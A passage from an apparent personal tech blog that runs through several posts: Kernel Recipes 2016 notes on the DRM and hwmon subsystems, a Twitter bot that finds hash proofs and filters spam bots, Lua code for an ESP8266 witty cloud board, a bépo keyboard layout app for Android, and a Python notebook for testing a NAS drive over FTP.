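    return min(1.0, max(0.0, (code - 16) / 219))


light_grey = 0.95
code = encode_full(light_grey)
print("code sent         :", code)
print("decoded as full   :", round(decode_full(code), 3))
print("decoded as limited:", decode_limited(code))
```

Every full-range code above 235 collapses to plain white when read as limited range, so the lightest greys simply disappear.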

State of DRM graphics driver subsystem

by Daniel Vetter; LWN article

The Direct Rendering Manager (DRM) subsystem is slowly taking over the world.

Daniel started by saying that the new kerneldoc toolchain (see above talk by Jonathan Corbet) is really nice. Everything with regards to the new atomic modesetting is documented. Lots of docs have been added.

Some issues in the old userspace-facing API are still there. Those old DRI1 drivers can't be removed, but have been prefixed with drm_legacy_ and isolated.

The intel-gpu-tools tests have been ported to be generic, and are starting to get used on many drivers. Some CI systems have been deployed, and documentation added.

The open userspace requirement has been documented: userspace-facing api in DRM kernel code requires an open source userspace program.

Atomic display drivers have allowed flicker-free modesetting, with check/commit semantics. It has been implemented because of hardware restrictions. It also allows userspace to know in advance if a given modification would be possible. You can then write userspace that can try approaches, without becoming too complex.

20 drivers and counting have been merged with an atomic interface, with 2 or 3 per release, as opposed to one per year (1 per 4 or 5 releases) in the 7 years before atomic modesetting. There's a huge acceleration in development, driving lots of small polish, boilerplate removals, documentation and new helpers.

There's a bright future, with the drm api being used in android, wayland, chromeos, etc. Possible improvements include a benchmark mode, or more buffer management like android's ion.

A generic fbdev implementation has been written on top of KMS.

Fences are like struct completion, but for DMA. Implicit fences are taken care of by the kernel. Explicit fences can be passed around by userspace. Fences allow synchronisation between components of a video pipeline, like a decoder and an upscaler for example.

With upcoming explicit fencing support in kernel and mesa, you can now run Android on upstream code, with graphics support.

The downside right now is the bleak support of rendering in open drivers. There are 3 vendor-supported, 3 reverse-engineered drivers, and the rest is nowhere to be seen.

The new hwmon device registration API

by Jean Delvare

The hwmon subsystem is used for hardware sensors available in every machine, like temperature sensors for example.

hwmon has come a long way. 10 years ago, it became unmaintainable, with lots of device-specific code in userspace libraries.

The lm-sensors v2 in 2004 was based on procfs for kernel 2.4, and sysfs for kernel 2.6.x.

In 2006, there was no standard procfs interface. Therefore, for lm-sensors v3, documentation was written, standards were enforced, and the one-value per sysfs file rule was adopted. No more device-specific code in libsensors and applications was allowed. Support for new devices could finally be added without touching user-space.
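The one-value-per-file rule is what makes generic userspace code possible. As a small sketch (not libsensors code), here is a reader for the temp*_input files, which hold a single integer in millidegrees Celsius. The function name and the `root` parameter are mine; the parameter only exists so the function can be pointed at a test directory.

```python
import glob
import os


def read_temperatures(root="/sys/class/hwmon"):
    """Return {path: degrees Celsius} for every temp*_input file found."""
    readings = {}
    pattern = os.path.join(root, "hwmon*", "temp*_input")
    for path in sorted(glob.glob(pattern)):
        try:
            with open(path) as handle:
                millidegrees = int(handle.read().strip())
        except (OSError, ValueError):
            continue  # sensor not readable right now: skip it
        readings[path] = millidegrees / 1000.0
    return readings


for path, celsius in read_temperatures().items():
    print(f"{path}: {celsius:.1f} C")
```

No device-specific parsing is needed: every driver exposing a temperature is read the same way.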

kernel-space

Once the userspace interface was fixed, it did not mean the end of the road.

It turned out that every driver implemented its own UAPI. So in 2005, a new hwmon sysfs class was submitted. It was quite simple, and all drivers were converted to the new subsystem at once.

It worked for a while, but wasn't sufficient. In 2013, a new hwmon device registration API was introduced: hwmon_device_register_with_groups. It gives the core flexibility, and allows it to validate the device name. Later that year a new API was added to help unregister and cleanup.

Finally, in July 2016 a new registration API was proposed, moving hwmon attributes into the core, and doing the heavy lifting of setting up sysfs properly. This patchset is still under review and discussion. Driver conversion won't be straightforward at all, but still deletes more code than it adds.

In conclusion, a good subsystem should help drivers, integrate well into the kernel, and offer a standard interface. It should provide a smaller binary size and have fewer bugs. But there are still concerns with regards to performance issues, and added complexity because of too many registration functions.

That's it for Kernel Recipes 2016 ! Congratulations if you managed to read everything !

Making a Twitter bot that looks for hashes

2016-09-09T18:00:00+02:00

This is a followup to What do you find when you search Twitter for hashes ?

Why ?

I'm not sure I remember how it started.

It all started four years ago. Jon Oberheide was still an independent security researcher and not yet CTO of a successful product company. He posted some hashes on twitter. I was perplexed at first but then I quickly understood that it was to serve as a proof in case someone disputed his research's findings later (and the time at which he found his results). He was posting hash proofs. And then Matthew Garrett did it too.

At the time Twitter wasn't very reliable for accessing old tweets (they vastly improved). I thought maybe by finding these hash proofs and indexing them, we could serve as an independent verifier. Nowadays all the kids put their hashes in the Bitcoin blockchain, and there are even services to do it from your browser.

So how to do it ?

This ought to be easy, right? The initial idea was to just do a simple search of random characters in the hexadecimal space, and hope that they are in hashes ? Well, not really. At first I thought it could be done, but it can't, because twitter search only works on full words, since it's tokenizing for indexing purposes. Which means you can't search for part of words hoping to stumble upon hashes. So much for using n-grams.

Therefore, I had to use the public sample stream, and filter every tweet in order to find relevant ones.

Firehose ? Not likely.

Twitter has a special stream that contains all the tweets being posted, called "Firehose". Few people get access to it. There are two other streams: Gardenhose, containing 10% of the tweets, and Spritzer, the sample stream containing 1% of the tweets. The bot currently runs on Spritzer. I requested access to Gardenhose, but never got an answer. It's part of the monetization strategy. No place here for hackers/hobbyists.

So the bot only sees 1% of tweets (I have tried to verify that with other public data, and it seems about right despite my initial doubts), which is why the bots haven't been talking much together yet. It also means there's a 99% chance of missing your tweet. And that development iteration speed is a hundred times slower.

How does it work ?

The initial version used a naive regex, but had too many false positives, from repeated characters, to magnet links of P2P files. Now it's much harder to match.

The regex is currently matching MD5, SHA1, SHA256 and SHA512 sizes. Most uses are covered.

I added a naive exclusion filter (all letters or all numbers), which might not detect extremely well crafted hashes a researcher might be working on. This is out of scope for hashproofs, the anti-spam measures are already pretty strong and might miss interesting content.
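The exclusion filter really is that naive. Something along these lines would do it (a sketch with a made-up function name, not necessarily what hashbot does line for line):

```python
def is_trivial_candidate(candidate):
    """True when the string is made only of letters or only of digits,
    which a real hex digest of this length almost never is."""
    return candidate.isalpha() or candidate.isdigit()


for text in ("a" * 32, "1" * 40, "2f404a288d1b564fadee944827a39a14"):
    print(text[:12] + "...", "rejected" if is_trivial_candidate(text) else "kept")
```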

Current approach

The first stage is a simple regex [a-f0-9]{32,128} . I wanted it as simple as possible because it is run on every tweet, and should be as fast as possible.
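In Python, this first stage fits in a couple of lines. The regex is the one quoted above; the function name and the sample strings are just for illustration.

```python
import re

# Compiled once, since it runs on every single tweet of the stream.
FIRST_STAGE = re.compile(r"[a-f0-9]{32,128}")


def might_contain_hash(text):
    """Cheap pre-filter: is there any run of 32 to 128 lowercase hex chars?"""
    return FIRST_STAGE.search(text) is not None


print(might_contain_hash("proof: 2f404a288d1b564fadee944827a39a14"))
print(might_contain_hash("hello world deadbeef"))
```

Note that it also accepts lengths that no common hash uses (33 characters, say). That's fine for a pre-filter: the later stages are there to be picky.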

The second stage is a much more complex regex (harder to match), with specific sizes of various hashes.
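I'm not reproducing the exact second-stage regex here, but the idea can be sketched like this, assuming the four digest sizes mentioned earlier (32, 40, 64 and 128 hex characters). The names are hypothetical, and the labels are only guesses based on length.

```python
import re

# Length in hex characters -> most likely digest type (a guess from size only).
HASH_LENGTHS = {32: "MD5", 40: "SHA1", 64: "SHA256", 128: "SHA512"}

# Exact sizes only, and not glued to more hex characters on either side.
SECOND_STAGE = re.compile(
    r"(?<![a-f0-9])"
    r"(?:[a-f0-9]{128}|[a-f0-9]{64}|[a-f0-9]{40}|[a-f0-9]{32})"
    r"(?![a-f0-9])"
)


def find_hashes(text):
    """Return (candidate, probable type) for each exact-size hex run."""
    return [(m.group(0), HASH_LENGTHS[len(m.group(0))])
            for m in SECOND_STAGE.finditer(text)]


print(find_hashes("md5 2f404a288d1b564fadee944827a39a14 of the file"))
print(find_hashes("too long: " + "0a" * 17))
```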

Then there are lots of manually crafted filters to fight off spam. Blocked keywords. Users banned automatically. Embedded images and most links are blocked.

Finally there is entropy measurement, making sure we have a hash and not a mindless series of characters.
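One common way to measure this is Shannon entropy over the characters of the candidate. The sketch below shows the principle; the 3.0 bits per character threshold is an arbitrary value picked for the example, not the one the bot uses.

```python
import math
from collections import Counter


def shannon_entropy(text):
    """Shannon entropy in bits per character (at most 4.0 for hex digits)."""
    if not text:
        return 0.0
    total = len(text)
    return -sum((n / total) * math.log2(n / total)
                for n in Counter(text).values())


def looks_random(candidate, threshold=3.0):
    """Assumed cut-off: real digests sit close to 4 bits per character."""
    return shannon_entropy(candidate) >= threshold


for text in ("2f404a288d1b564fadee944827a39a14", "ab" * 16, "0" * 31 + "a"):
    print(f"{text}: {shannon_entropy(text):.2f} bits/char")
```

A string like "abab…" passes both regexes and the all-letters/all-digits filter, but it only carries 1 bit per character, so it gets thrown out here.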

Performance research

To improve performance, I built in quite a few tools. For example, there's a command to dump the sample stream into a temporary file (that you're not allowed to keep). This file is then used to measure performance in a repeatable fashion (there's no contradiction here, right ?), isolated from the network.

I implemented different versions of the core line processing, some of which are still in the tests. I was trying to see how to speed up the code. But after some profiling, I realized that most of the time was spent in json processing. Moving to ultrajson (ujson) divided the processing time by 5, compared to python2's cjson module.
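If you want to run this kind of comparison yourself, a small harness is enough. This is a sketch, not the benchmark code from hashbot: it uses the stdlib json module as the baseline, made-up sample data, and only tries ujson if it happens to be installed.

```python
import json
import time


def time_json_loads(loads, lines, repeat=3):
    """Best wall-clock time (seconds) to parse every line with `loads`."""
    best = float("inf")
    for _ in range(repeat):
        start = time.perf_counter()
        for line in lines:
            loads(line)
        best = min(best, time.perf_counter() - start)
    return best


# Stand-in for a dumped sample stream: one JSON document per line.
sample = [json.dumps({"id": i, "text": "tweet %d" % i}) for i in range(1000)]

print("json :", time_json_loads(json.loads, sample))
try:
    import ujson  # optional third-party module
    print("ujson:", time_json_loads(ujson.loads, sample))
except ImportError:
    print("ujson not installed, skipping")
```

Your numbers will differ from mine depending on the Python version and on how big the real tweets are, so measure on a real dump before drawing conclusions.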

Bot detection and spam fighting algorithm

What I did was initially mostly manual: keyword based, username and client based. I kept adding new keywords and banning new clients, but it didn't scale.

I then implemented an analysis of a matched user's timeline. Within the last 200 tweets, if it had more than 5% of hashes, it was probably a bot. It greatly cut the spam at first, and since its implementation in 2013 it has detected 14k+ accounts posting more than 5% of hashes, and 2.7k+ accounts posting more than 50%.
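The timeline check boils down to a ratio. Here is a simplified sketch: it assumes the timeline is a list of tweet texts ordered from oldest to newest, and it reuses the simple first-stage regex to decide what counts as "a hash", which is cruder than what the bot really does.

```python
import re

HASH_RE = re.compile(r"[a-f0-9]{32,128}")


def hash_ratio(tweets, window=200):
    """Share of the last `window` tweets that contain a hash-looking string."""
    recent = tweets[-window:]
    if not recent:
        return 0.0
    matching = sum(1 for text in recent if HASH_RE.search(text))
    return matching / len(recent)


def is_probable_bot(tweets, threshold=0.05):
    """More than 5% of hashes in the recent timeline: probably a bot."""
    return hash_ratio(tweets) > threshold


timeline = ["good morning"] * 180 + ["2f404a288d1b564fadee944827a39a14"] * 20
print(hash_ratio(timeline), is_probable_bot(timeline))
```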

There were still a LOT of things passing through (including porn). But the strategy is to use automatic (algorithmic) filtering, not manual. I had to resort to blocking most outgoing URLs, meaning there's nothing to spam for. I had to filter tweets containing images.

Earlier this year, I discovered that a spam network selling followers used the new Twitter Cards to embed links & images without having a URL in the tweet, so I added a filter for that too. For some reason, they were posting lots of hashes. Maybe adding entropy helps circumvent Twitter's detection systems.

Challenges

The code is not py3k compatible for historical reasons (used to need requests-oauth, but moved since to requests-oauthlib (which at some point was inside requests)), although I love py3k. I also had to use ur"" strings, which were ported in python 3.3, which wasn't available at the time. The porting shouldn't be very hard.

It was very hard to deal with twitter intermittent service. I developed a watchdog specifically to detect hangs, and then auto-restart. It's the easy way out, but has allowed the bot to work quite well, with months-long uptimes between the updates.
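The watchdog principle is simple: note when the last piece of data arrived, and consider the stream hung when nothing has come in for too long. Below is a minimal sketch of that idea, not the actual hashbot watchdog; the class name, the 90 seconds timeout and the injectable clock are all choices made for the example.

```python
import time


class Watchdog:
    """Tracks the last sign of life of a stream and reports when it looks hung."""

    def __init__(self, timeout, clock=time.monotonic):
        self.timeout = timeout      # seconds of silence tolerated
        self.clock = clock          # injectable, which makes testing easy
        self.last_seen = clock()

    def feed(self):
        """Call this every time something is received from the stream."""
        self.last_seen = self.clock()

    def expired(self):
        """True when nothing has been received for more than `timeout` seconds."""
        return self.clock() - self.last_seen > self.timeout


watchdog = Watchdog(timeout=90)
watchdog.feed()
print("hung" if watchdog.expired() else "alive")
```

In practice feed() goes in the loop reading the stream, and something else (a timer thread, or a supervisor process) polls expired() and restarts the connection when it returns True.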

As I said earlier, it's hard to debug with a very slow stream that makes errors appear a hundred times more slowly.

Finally, this "light" stream means there's a 99% chance of missing your tweet. Unless you have a lot of followers that RT you, but then you don't need hashproofs, do you ?
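To put a number on the retweet effect, here is a quick calculation. It assumes each copy of the tweet (the original and every retweet) has an independent 1% chance of landing in the sample stream, which is a simplification: I don't know how Twitter actually picks the sampled tweets.

```python
def chance_of_being_sampled(copies, sample_rate=0.01):
    """Probability that at least one of `copies` tweets lands in the sample,
    assuming each one is picked independently with `sample_rate`."""
    if copies < 0:
        raise ValueError("copies must not be negative")
    return 1.0 - (1.0 - sample_rate) ** copies


for copies in (1, 10, 100, 500):
    print(f"{copies:4d} copies: {chance_of_being_sampled(copies):.1%}")
```

With this model you need on the order of a hundred retweets before the odds of being seen get better than a coin flip.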

Potential improvements

Follow user streams and watch for hashes. The bot already auto-follows people below a certain rate, for a good potential feed.
Use a hashtag (e.g. #hashproof) that security researchers can use so that their important tweets are seen.

Gimme the code, gimme the data

Today I'm publishing the source code for hashbot on Github. The data is available there as well and analyzed in the earlier article.

Who noticed ?

I actually implemented Georg's suggestion and all hashes were entropy checked after this.

Yeah, spam was this bad (and still is to an extent).

It was also noticed by @adulau

He asked about the code. Which is why you're seeing this here today.

A few successful findings

There ought to be some after all ? Here are a few:

Lessons from the project

Always test, makes for robust code.

Always benchmark, you might have surprises, cf. ultrajson that gave a 5x speedup.

A watchdog is essential when interacting with an external, long-lived service. Twitter has been stopping the stream while keeping the TCP socket open many times, which would mean a hang of the bot.

What do you find when you search Twitter for hashes ?

2016-09-09T17:00:00+02:00

This image:

This is what I found with hashbot, a twitter bot that looks for hashes.

What is this image ?

Posted with the hash "2f404a288d1b564fadee944827a39a14" by japanese accounts (of which @furueru_zekkei used to be the top poster, now suspended).

After a bit of research on google images and more, I found that this image is a photo of the White Desert in New Mexico, by Greg Riegler. This might or might not be the same Greg Riegler as here.

Why is this ?

Bots. There are lots of them. The Internet is made of bots.

This is what you were most likely to find until 2015 (with a 10% chance).

How do I know that ? Well I searched. But this is a story for another post.

What else do you find ? Bots bots bots.

Along with this, I found many Japanese bots mentioning @null

Porn posting bots. The internet is made of them. For some reason they post hashes... maybe to make sure their tweets are unique and not detected as a spam network ?

Occasional git and mercurial commit IDs.

Security researchers posting proof-of-work. This was the initial motivation behind hashproofs.

iPhone UDIDs. Apparently there's a 'market' on Twitter between devs and users to enable iPhones with beta builds:

Giveaway of various activation codes for games, digital products.

People crowd-sourcing password hashes, and bots running rainbow table queries.

Bitcoin transaction IDs:

Torrent hashes:

Some things just impossible to understand:

LOTS of bots posting more than 5% of tweets containing hashes (found a lot). These won't appear in the results, but here is the list.

I realize how ironic it is to criticize Twitter for having a lot of bots, because the same conditions that allowed all these bots (the API), also permitted this research (as compared to a scraping bot that would have to be updated more often). Of course, hashproofs isn't really spamming, and just acts as a "curator", and does a job that would be impossible to do for a human (i.e analyzing lots of tweets/s).

The full list of results can be found on hashproofs' Twitter feed.

Give me the data

I published the code on Github and the full results of the four-year research. (WARNING: contains spam and porn links)

This should give you the full data you need to re-analyze the results or run your own hashbot instance (with a better algorithm? or access to a better stream ?)

Unveiling a few bot networks

As I explained earlier, hashproofs analyzes the timeline of users for every matching tweet. If the percentage of matching tweets they have is above a certain arbitrary level (5%), the username is banned locally. If it's over 50%, the account is blocked. That's why you'll find two different lists in the results. One is from Twitter, listing the ids of blocked accounts. The other is the content of the "banlist" state file of the bot.
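The two-tier decision can be summed up in a few lines. This is a sketch of the logic as described above, with hypothetical names and return values; the real bot also has to talk to the Twitter API to actually block an account.

```python
def classify_account(matching, total, ban_threshold=0.05, block_threshold=0.50):
    """Decide what to do with an account from its share of matching tweets.

    Returns "block" (blocked on Twitter), "ban" (added to the local banlist)
    or "ok".
    """
    if total <= 0:
        return "ok"
    ratio = matching / total
    if ratio > block_threshold:
        return "block"
    if ratio > ban_threshold:
        return "ban"
    return "ok"


for matching in (3, 11, 120):
    print(matching, "of 200 ->", classify_account(matching, 200))
```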

By analyzing the list of blocked users, I found a few legitimate bots (e.g. posting commits on twitter, running rainbow tables, see earlier). I also found a lot of spam bots, some of which were taken care of by twitter. I also discovered that spammers tend to rename their accounts, and my younger self only thought of tracking the usernames, not the account ids, so that's why you'll see discrepancies if you try to have the two lists match.

You'll also see that even regular users rename their account if you look at historical data from 2014.

Here are a few excerpts from the banlist that show Twitter handles that I doubt have been created by legitimate users:

  3924fe95e2cd5f8
  68c59dbbb15c5a4
  6298c2a08ef9b3b
  a33262acc8e5c77
  b2dc44d67994d44
  21332a575639f58
  […]
  Cloud404aa
  cloud405aa
  cloud406aa
  cloud407aa
  […]
  000xxx_6wy
  000xxx_897
  000xxx_dr3
  […]
  Death_ldo
  Death_y7s
  Death_mew
  Death_ojy

All of those are in sequence, which means they were detected by hashproofs one after the other. There are many other examples like this if you want to look at all the 14k+ automatically banned handles.

If you're interested in the historical and technical details, read on to the following article.

Unofficial witty cloud module documentation with nodemcu firmware

2016-02-25T00:00:00+01:00

I wanted to try my hand with ESP8266 modules, so I got a witty cloud development board. It's running a proprietary firmware from gizwits which I backed up if anyone wants to look at it.

The board is in two parts: a programming board ("cape") with a ch340g usb serial and 3.3V converter (plus flash and reset buttons); and a main board with the esp module, an ams1117 3.3V voltage regulator, a button, a blue led, an rgb led, and a light sensor (photo resistor). All this for the price of a nodemcu board, but in a smaller form factor.

One of the greatest things about the ESP8266 ecosystem is nodemcu-firmware, an environment that lets you program the microcontroller in lua, which greatly simplifies prototyping and getting familiar with the chip.

After backing up the flash with esptool (see esptool read_flash), I flashed the latest release of nodemcu-firmware. Then, using nodemcu-uploader, one can access the lua REPL (nodemcu-uploader terminal) and upload lua scripts (nodemcu-uploader --baud 9600 upload init.lua); init.lua is the first script run at power-up.

Quick doc

I reverse-engineered the various goodies that are on board, since I didn't find any documentation on this specific board online:

Blue LED: use the PWM 4. High duty cycle = OFF.

-- Use a LED with a 500Hz PWM
function led(pin, level)
    pwm.setup(pin, 500, level)
    pwm.start(pin)
end

-- Control the Blue LED: 0 -> 1023 higher means light off
function blueLed(inverted_level)
    led(4, inverted_level)
end

blueLed(10) -- test at high intensity

RGB LED: use PWMs 8, 6, 7. High duty cycle = ON.

-- Control an RGB LED: three 0->1023 values; higher means more light
function rgb(r, g, b)
    led(8, r)
    led(6, g)
    led(7, b)
end

rgb(500, 0, 0) -- test RED

Button: GPIO 2. button pressed = 0 level.

-- launch connect() on button press
gpio.mode(2, gpio.INPUT)
gpio.trig(2, "down", connect)

Light sensor: use the ADC.

-- Print light sensor value
print(adc.read(0))

Going further

I then discovered the official nodemcu-firmware documentation currently points to the dev branch; which has many new modules and functions I wanted to use (like the wifi event monitor or http module) that weren't available in master yet. I used the nodemcu cloud builder, a service provided by a kind community member to build a custom version of nodemcu-firmware on the dev branch and the modules I needed enabled.

This makes it possible to write this kind of code, which connects to wifi on a button press and reacts with a simple HTTP request:

function connect()
    -- if wifi is already connected (config saved), launch job directly
    if wifi.sta.status() == wifi.STA_GOTIP then
        doOnlineJob()
        return
    end
    rgb(1000, 50, 0) -- turn orange
    for event=wifi.STA_IDLE,wifi.STA_GOTIP do
        wifi.sta.eventMonReg(event, monCallback)
    end
    wifi.sta.config("mynetworkssid", "mynetworkpassword")
    wifi.sta.eventMonStart(100) --the event mon polls every 100ms for a change
end

function monCallback(prevState)
    local state = wifi.sta.status()
    if prevState == nil then
        prevState = "unknown"
    end
    print("Wifi status " .. prevState .. " -> " .. state)
    blueLed(state*204) -- led intensity depends on status, with success = OFF
    if state == wifi.STA_GOTIP then
        rgb(0, 200, 150) --blue/green-ish, wifi OK
        print("Got IP " .. wifi.sta.getip())
        wifi.sta.eventMonStop("unreg all") -- stop event monitor
        doOnlineJob()
    end
    -- failure states use the same wifi.STA_* naming as the other states
    if state == wifi.STA_APNOTFOUND or state == wifi.STA_FAIL then
        rgb(150, 0, 0) -- red/fail
        wifi.sta.eventMonStop("unreg all") -- stop event monitor
    end
end

function doOnlineJob()
    rgb(150, 0, 150) -- working, purple
    http.post("http://example.invalid/api/pushed", nil,
        '{"hello": "from_esp_witty_42"}', function(status_code, body)
            if status_code == nil or body == nil then
                print(status_code)
                print(body)
                rgb(200, 0, 0) --fail red
                return
            end
            print("Got code " .. status_code .. " answer " .. body)
            if status_code == 200 then
                rgb(0, 0, 200) --success, blue
            end
        end)
end

This reproduces the software side of the DASH/IoT Button, Netflix Switch or Flic.

There are a few projects that will guide you through the hardware part of building a button with an ESP module.

PS: Be careful of big https cert chains, there's a hardcoded limit of 5120 bytes for the SSL buffer in the firmware, that might make the handshake fail.

PPS: 2016-07-01 I did a talk on ESP8266 modules at the Paris Embedded Meetup #9.

Bépo-android

2015-01-27T00:00:00+01:00

This is a small project I recently released on github and Google Play. It aims at catering to the needs of people using the bépo layout, and wanting to use it for physical keyboards on Android.

Bépo is a French dvorak-like keyboard layout; it was designed by a community of enthusiasts, and is now included in Xorg. Its platform support is pretty good on the three main PC OSes, but limited on Android. For physical keyboards, there's a paid app that supports the bépo layout (as part of a whole package of other keymaps) but it requires you to use it as your input method, whereas since Android 4.1 it's possible to have custom keyboard layouts exported by apps and managed by the system.

It's this facility that is used by bepo-android (or Bépo clavier externe): a simple intent property you declare in your manifest to tell the system that you're exporting keyboard layouts, with which you point to an xml file listing all your keyboard layouts, each pointing to a single .kcm file. bepo-android is currently exporting a single layout file, generated for bépo.

The bépo project has this wonderful tool called the configGenerator that allows regenerating the whole set of keymap files, images of the layout, and configuration files for all platforms in a single command, which runs a few shell, perl and python scripts. This allowed the project to move fast when making modifications, but is today used mostly by enthusiasts creating their own variants (I used to have such a variant, but now I just use the official one). I created such a script for the android platform. So the script generates the necessary .kcm file, and could be re-run with your own customized bépo layout as source. An alternative possible use would be to use its ability to read xkb files to export Xorg keymaps to Android. This would probably need adaptation to add support for more exotic languages and characters.

Android has this two-tier keyboard management system. First, there is the key layout, which maps evdev keycodes into key names. The key names currently match the ones in Linux's input.h. There's a default key layout you can use as a base, Generic.kl. Then there's the key character map, which tells the system which unicode character to input when you press a given key. This is at least two orders of magnitude simpler than Xorg's system, although xkb is also much more powerful.

As you might have guessed, the file generated for this project is a key character map, that also uses the undocumented "map key" directive, to remap a part of the key layout to make sure it's not changing under us; for instance Archos has a different key layout for its keyboards than the default.

One of the tradeoffs I had to make was to have the underlying key layout be a QWERTY, that then generates bépo characters. This decision was due to the fact that we cannot attribute key names to all keys: ÉÀÈÊÇ, etc. don't have key labels (found in KeycodeLabels.h or InputEventLabels.h depending on your AOSP version), so you can't simply remap all keys in order to have a bépo key layout; you'd have holes in it. I therefore had to resort to using QWERTY as a base, as it's the one in Generic.kl. I'm also secretly hoping it might help with badly-programmed games that have keyboard support, assume qwerty, and don't allow key remapping. If those exist on Android (they are legion on the web, which is very annoying).
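
The two tiers and the QWERTY-base tradeoff can be sketched in a few lines. This is only an illustration of the lookup chain, not the format of .kl or .kcm files; the dictionary and function names are hypothetical, and only the first five keys of the top letter row are shown. The scancodes are the KEY_Q to KEY_T values from Linux's input.h.

```python
# Tier 1, the key layout: evdev scancode -> key name.
# The key names stay QWERTY, as in the default layout.
KEY_LAYOUT = {16: "Q", 17: "W", 18: "E", 19: "R", 20: "T"}

# Tier 2, the key character map: key name -> character produced.
# This is where bépo happens; "É" never has to exist as a key name.
BEPO_CHARACTER_MAP = {"Q": "b", "W": "é", "E": "p", "R": "o", "T": "è"}


def character_for(scancode):
    """Resolve a scancode to a character through both tiers."""
    key_name = KEY_LAYOUT.get(scancode)
    if key_name is None:
        return None  # scancode unknown to the key layout
    return BEPO_CHARACTER_MAP.get(key_name)


print("".join(character_for(code) for code in range(16, 20)))
```

An application that only looks at key names still sees Q, W, E and R, which is the behaviour the QWERTY base was chosen for.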

The bépo key character map also maps the documented special diacritical dead keys; this is quite useful, but not as complete as xkb's many dead keys, and not nearly as powerful as Xorg's Compose; so not all bépo dead and compose keys are supported.

This currently only works with devices having Android 4.1+, provided the manufacturer didn't botch the external keyboard support, as Asus did on my Fonepad 7 (K019), and as a user reported for a Samsung Galaxy Note 10.1. OEMs do that to allow synchronisation between the virtual and physical keyboard layouts, but this is just wrong if it removes the user's ability to choose their own keymap.

I have yet to hear about other non-working devices; after a month or so, the app hasn't seen much traction (Google Play says there are fewer than 50 installs); so maybe in the niche that is bépo, there isn't much interest in typing stuff on Android. We could even wonder if people would ever do productive work on this platform. But that's a debate for another day.

At least I scratched my itch =)

Get Bépo clavier externe on Google Play.

Testing a NAS hard drive over FTP

2013-12-20T00:00:00+01:00

So I have this NAS made by my ISP, that does a lot of things; but recently, I started having issues with its behavior. Recorded TV shows had lag/jitter while replaying, and the same happened with other types of videos I put on it. I narrowed it down to the hard drive, which was sometimes providing read speeds of less than 300 KiB/s. I cannot open it to test the hard drive more thoroughly, using mhdd or ATA SMART tests. I'll have to innovate a little.

In this post, in the form of an ipython3 notebook (source), I'm going to test the hard drive over FTP, by doing a full hard drive fill, and then a read. I'm going to:

measure the read and write speed to see if the problem is still present after I formatted it
make sure what I wrote is the same as what I read
make sure that I can generate data fast enough
make the data look "random" so that I don't stumble upon some compression in the FTP -> fs -> hard drive chain

If everything is well I'll just get on with it: formatting the hard drive fixed the issue. Otherwise, it might be a hardware problem, and I'll have to exchange it.

To generate the data, I'll use an md5 hash for its nice output, which looks fairly random and is very hard to compress. I chose md5 because it's fast. I'll use a sequential index as the input so that it's deterministic and I can fairly easily re-generate the input data for comparison.

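import hashlib
h = hashlib.new("md5")
# Generate a deterministic hash: h is updated cumulatively, so the digest
# depends on every index fed so far and is only reproducible when data()
# is called in the same order on a fresh h.
def data(i):
    # Note: in Python 3, bytes(i) is a run of i zero bytes, not the
    # encoding of the integer i, so the hashed input grows with i.
    h.update(bytes(i))
    return h.digest()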

import time
def testdata():
    n = 10000
    size = h.digest_size
    start = time.perf_counter()  # time.clock() was removed in Python 3.8
    for i in range(n):
        data(i)
    end = time.perf_counter()
    speed = n*size/(end-start)
    print("We generated %d bytes in %f s %d B/s"%(n*size, end-start, speed))

testdata()

We generated 160000 bytes in 1.610000 s 99378 B/s

Ouch. I use a slow machine, and it's far from the at least 60MiB/s I need to thoroughly test the hard drive. Let's see if I can find a faster hash.

def testallhashes():
    global h
    # "name" avoids shadowing the built-in hash()
    for name in hashlib.algorithms_available:
        h = hashlib.new(name)
        print(name, end=' ')
        testdata()

testallhashes()

SHA1 We generated 200000 bytes in 2.570000 s 77821 B/s
SHA512 We generated 640000 bytes in 6.780000 s 94395 B/s
RIPEMD160 We generated 200000 bytes in 2.870000 s 69686 B/s
SHA224 We generated 280000 bytes in 3.480000 s 80459 B/s
sha512 We generated 640000 bytes in 6.770000 s 94534 B/s
md5 We generated 160000 bytes in 1.620000 s 98765 B/s
md4 We generated 160000 bytes in 1.350000 s 118518 B/s
SHA256 We generated 320000 bytes in 3.500000 s 91428 B/s
ripemd160 We generated 200000 bytes in 2.870000 s 69686 B/s
whirlpool We generated 640000 bytes in 19.590000 s 32669 B/s
dsaEncryption We generated 200000 bytes in 2.580000 s 77519 B/s
sha384 We generated 480000 bytes in 6.800000 s 70588 B/s
sha1 We generated 200000 bytes in 2.570000 s 77821 B/s
dsaWithSHA We generated 200000 bytes in 2.580000 s 77519 B/s
SHA We generated 200000 bytes in 2.580000 s 77519 B/s
sha224 We generated 280000 bytes in 3.490000 s 80229 B/s
DSA-SHA We generated 200000 bytes in 2.570000 s 77821 B/s
MD5 We generated 160000 bytes in 1.600000 s 99999 B/s
sha We generated 200000 bytes in 2.570000 s 77821 B/s
MD4 We generated 160000 bytes in 1.350000 s 118518 B/s
ecdsa-with-SHA1 We generated 200000 bytes in 2.570000 s 77821 B/s
sha256 We generated 320000 bytes in 3.490000 s 91690 B/s
SHA384 We generated 480000 bytes in 6.780000 s 70796 B/s
DSA We generated 200000 bytes in 2.590000 s 77220 B/s

Well, no luck. I'll just use a big buffer and have it loop around.

def bigbuffer():
    global h
    h = hashlib.new("md5")
    buf = bytearray()
    count = 2**18 // h.digest_size  # we want a 256KiB buffer
    for i in range(count):
        buf += data(i)
    return buf

assert len(bigbuffer()) == 262144  # verify the length
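
Whether such a buffer really resists compression can be checked with a quick sketch like the one below. It is not part of the original notebook: digest_buffer and compression_ratio are hypothetical helpers, and unlike data() above, each index is hashed independently from its decimal string. zlib only stands in for whatever compression might sit in the FTP -> fs -> hard drive chain.

```python
import hashlib
import zlib


def digest_buffer(size=2**18):
    """Concatenate MD5 digests of successive indexes until size bytes."""
    buf = bytearray()
    i = 0
    while len(buf) < size:
        buf += hashlib.md5(str(i).encode()).digest()
        i += 1
    return bytes(buf[:size])


def compression_ratio(payload, level=9):
    """Compressed size divided by original size (1.0 = no gain)."""
    return len(zlib.compress(payload, level)) / len(payload)


print("digests: %.3f" % compression_ratio(digest_buffer()))
print("zeros:   %.3f" % compression_ratio(bytes(2**18)))
```

A ratio close to 1 for the digests, against a tiny ratio for the run of zeros, suggests a compressing layer would have little to gain on one pass of the buffer.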

That covers the basics.

class CustomBuffer:
    """
    A wrap-around file-like object that returns in-memory data from buf
    """
    def __init__(self, limit=None):
        self.buf = bigbuffer()
        self.bufindex = 0
        self.fileindex = 0
        self.bufsize = len(self.buf)
        self.limit = limit
    def readloop(self, i=8096):
